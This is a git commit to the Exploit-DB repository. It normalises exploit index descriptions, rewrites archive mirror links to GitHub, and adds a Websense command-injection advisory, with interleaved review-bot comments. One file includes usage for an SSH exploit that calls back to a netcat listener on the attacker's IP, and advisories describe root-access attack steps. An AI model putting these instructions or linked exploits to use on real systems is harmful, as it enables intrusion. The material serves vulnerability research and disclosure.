DB: 2015-03-19

2 new exploits
Offensive Security 2015-03-19 09:39:10 +00:00
parent 2c86657105
commit 5924dde297
1164 changed files with 1499 additions and 1313 deletions


@ -4481,7 +4481,7 @@ id,file,description,date,author,platform,type,port
4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0
4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0
4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0
4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0
4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0 4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0
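
Review bot: Row 4842 is left in the old description style while the row above it is being normalized. The change adds " - " between "<= 2.1.7" and "ACTIVE XSS/SQL Injection Exploit" on 4841, and 4838, 4839, 4840, 4843 and 4844 in the context already use that separator, but 4842 still reads "NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit" with no separator. If the aim is a "product version - title" field that search tooling can split reliably, fix 4842 in the same pass.
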
@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22 5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
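
Review bot: Only row 5632 gets the " - " separator here, and it is inserted after a product name with no version ("Debian OpenSSL - Predictable PRNG ..."), so the field on the left of the separator is not consistently "product version". All six context rows (5629, 5630, 5631, 5633, 5634, 5635) still lack the separator. A scripted pass over the description column with a documented rule would be easier to review than one-off edits like this.
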
@ -32839,6 +32839,8 @@ id,file,description,date,author,platform,type,port
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0
36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447


@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source orig: http://zenthought.org/content/file/android-root-2009-08-16-source
back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
# milw0rm.com [2009-08-18] # milw0rm.com [2009-08-18]
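
Review bot: The rewritten `back:` link points at `raw/master` of exploit-database-bin-sploits, so what it resolves to can change or vanish whenever that branch moves, and the file gives a reader no way to verify the archive they fetch. Suggest a commit-pinned raw URL, or a SHA-256 of android-root-20090816.tar.gz recorded next to the link. The `orig:` line above it is still plain HTTP and is left untouched. The same concern applies to every mirror link rewritten to `raw/master` in this commit.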


@ -10,7 +10,7 @@
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
# A similar exploitation vector was also added lately in Padbuster v0.3: # A similar exploitation vector was also added lately in Padbuster v0.3:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
# http://www.exploit-db.com/sploits/padBuster.pl # https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
# #
# #
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)


@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info
A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality.
http://www.exploit-db.com/sploits/19840.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19840.tgz


@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags
Hacker mounts modified device as /usr. Hacker mounts modified device as /usr.
Hacker installs backdoored /usr/bin/login. Hacker installs backdoored /usr/bin/login.
http://www.exploit-db.com/sploits/19411.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19411.tgz


@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info
A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process.
http://www.exploit-db.com/sploits/23655.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23655.tar.gz


@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip


@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
improper handling of environment variables. improper handling of environment variables.
Download: Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0404.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf


@ -14,4 +14,4 @@ Vulnerability Description:
Some files that allow to obtain usernames and other internal information can be read by any user inside Some files that allow to obtain usernames and other internal information can be read by any user inside
the CLI. the CLI.
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0403.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf


@ -196,7 +196,7 @@ Kingcope
A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
Mirror: http://www.exploit-db.com/sploits/ssh_0day.tar.gz Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
run like ./ssh -1 -z <yourip> <target> run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first setup a netcat, port 443 on yourip first
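
Review bot: Only the Mirror line is updated, while the line above it still sends readers to http://isowarez.de/ssh_0day for a statically linked binary over plain HTTP. Another file touched in this same commit carries the author's own remark that isowarez.de "got hacked", so that original location should not be presented as a live download. Suggest marking the isowarez.de link as historical and leaving the mirror archive as the only retrievable copy.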


@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
/Signed "the awesome" Kingcope /Signed "the awesome" Kingcope
Code: Code:
http://www.exploit-db.com/sploits/7350roaringbeastv3.tar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar


@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be
Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services.
http://www.exploit-db.com/sploits/20593.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20593.tgz


@ -15,4 +15,4 @@ improper profile check.
=========== ===========
Download: Download:
=========== ===========
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf


@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
=============== ===============
Download Download
=============== ===============
http://www.exploit-db.com/sploits/Sony_Ericsson.rar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar


@ -15,4 +15,4 @@ Users inside the CLI can run some kind of
of an insecure ulimit value. of an insecure ulimit value.
Download: Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0401.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf


@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/savysoda_poc.xls https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls


@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/office2_poc.xls https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls


@ -1,3 +1,3 @@
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
http://www.exploit-db.com/sploits/goodreader_poc.xls https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls


@ -130,7 +130,7 @@ other bugs and understanding them :)
http://aluigi.org/poc/samsux_1.zip http://aluigi.org/poc/samsux_1.zip
http://www.exploit-db.com/sploits/18751.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18751.zip
####################################################################### #######################################################################


@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to
This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. This problem makes it possible for system local to the network to deny service to legitmate users of that network segment.
http://www.exploit-db.com/sploits/20821.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20821.tgz


@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate
This problem makes it possible for a remote user to deny service to legitimate users of the switch. This problem makes it possible for a remote user to deny service to legitimate users of the switch.
http://www.exploit-db.com/sploits/20824.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20824.tgz


@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw
This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678.
http://www.exploit-db.com/sploits/21092.mrc https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21092.mrc


@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info
It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network.
http://www.exploit-db.com/sploits/22596.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22596.zip


@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info
It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory.
http://www.exploit-db.com/sploits/22978.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22978.tgz


@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera
Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process. Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process.
http://www.exploit-db.com/sploits/23876.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23876.zip


@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib
All versions of cdp are assumed to be vulnerable to this issue. All versions of cdp are assumed to be vulnerable to this issue.
http://www.exploit-db.com/sploits/23900.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23900.tgz


@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash
The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed. The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed.
http://www.exploit-db.com/sploits/28228.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28228.zip


@ -27,7 +27,7 @@ POC/EXPLOIT
you can open this url with the browser or send mms with this image. you can open this url with the browser or send mms with this image.
http://es.geocities.com/jplopezy/nokiacrash.jpg http://es.geocities.com/jplopezy/nokiacrash.jpg
alt: http://www.exploit-db.com/sploits/2009-nokiacrash.jpg alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg
------------------------------------------------------ ------------------------------------------------------
Juan Pablo Lopez Yacubian Juan Pablo Lopez Yacubian


@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia
Since user-supplied data is written to the target file, attackers may be able to elevate privileges. Since user-supplied data is written to the target file, attackers may be able to elevate privileges.
http://www.exploit-db.com/sploits/21001.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21001.tar.gz


@ -9,7 +9,7 @@
# V100R001B121Telmex # V100R001B121Telmex
# Exploit Download Link: # Exploit Download Link:
# http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
# http://www.exploit-db.com/sploits/HG520_udpinfo.tar.gz # https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz
By sending a specially crafted UDP packet you can remotely obtain the By sending a specially crafted UDP packet you can remotely obtain the


@ -7,6 +7,6 @@
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
# CVE : No CVE US-CERT VU#723755 # CVE : No CVE US-CERT VU#723755
http://www.exploit-db.com/sploits/reaver-1.1.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz


@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info
Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem.
http://www.exploit-db.com/sploits/19538-1.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-1.tar.gz
http://www.exploit-db.com/sploits/19538-2.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-2.tar.gz
http://www.exploit-db.com/sploits/19538-3.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-3.tar.gz


@ -1,5 +1,5 @@
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
http://www.exploit-db.com/sploits/07182006-btvoyager.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz
# milw0rm.com [2006-07-18] # milw0rm.com [2006-07-18]


@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info
When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret.
http://www.exploit-db.com/sploits/22532.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22532.tar.gz


@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all
Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access.
http://www.exploit-db.com/sploits/23212.tar.bz2 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23212.tar.bz2


@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term.
The 50 megs Mikrotik package including the all research items can be downloaded here: The 50 megs Mikrotik package including the all research items can be downloaded here:
http://www.farlight.org/mikropackage.zip http://www.farlight.org/mikropackage.zip
http://www.exploit-db.com/sploits/28056.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip


@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o
These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15.
http://www.exploit-db.com/sploits/31132.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31132.zip


@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl
Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4 Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
Software Versions: V100R001B120Telmex, V100R001B121Telmex Software Versions: V100R001B120Telmex, V100R001B121Telmex
http://www.exploit-db.com/sploits/33869.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33869.tar.gz


@ -1,4 +1,4 @@
When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance.
The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device.
Advisory: http://www.exploit-db.com/sploits/34465.pdf Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf


@ -197,7 +197,7 @@ name="backdoor">
Proof-of-concept brute force tool available at Proof-of-concept brute force tool available at
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
http://www.exploit-db.com/sploits/2009-Louhi_CMC-brute_090323.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip
Other information: Other information:


@ -1,6 +1,6 @@
The pdf is located at: The pdf is located at:
http://www.exploit-db.com/sploits/lynn-cisco.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf
/str0ke /str0ke


@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
Detailed description available here: Detailed description available here:
http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf
POC code available here: http://www.exploit-db.com/sploits/hnap0wn.tar.gz POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz


@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
logged-in user. logged-in user.
Download: Download:
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0402.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf


@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node Root-Node
Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse


@ -9,7 +9,7 @@ http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
# Tested on: TP-Link TL-WR740N v4 # Tested on: TP-Link TL-WR740N v4
Exploit: Exploit:
http://www.exploit-db.com/sploits/34254.7z https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34254.7z
Vulnerability description: Vulnerability description:
The domain name parameters of the "Parental Control" and "Access The domain name parameters of the "Parental Control" and "Access


@ -1,3 +1,3 @@
The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices.
http://www.exploit-db.com/sploits/ios_pdf_exploit.7z https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z

View file

@ -54,7 +54,7 @@ into the JS code).
The full exploit code is available here: The full exploit code is available here:
http://packetstormsecurity.com/files/123088/ http://packetstormsecurity.com/files/123088/
http://www.exploit-db.com/sploits/28081.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28081.tgz
+------------------------------------------------------------------------------+ +------------------------------------------------------------------------------+

View file

@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne
An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers.
http://www.exploit-db.com/sploits/30502.tti https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30502.tti

View file

@ -0,0 +1,38 @@
Abstract
A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Tested versions
This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well.
Fix
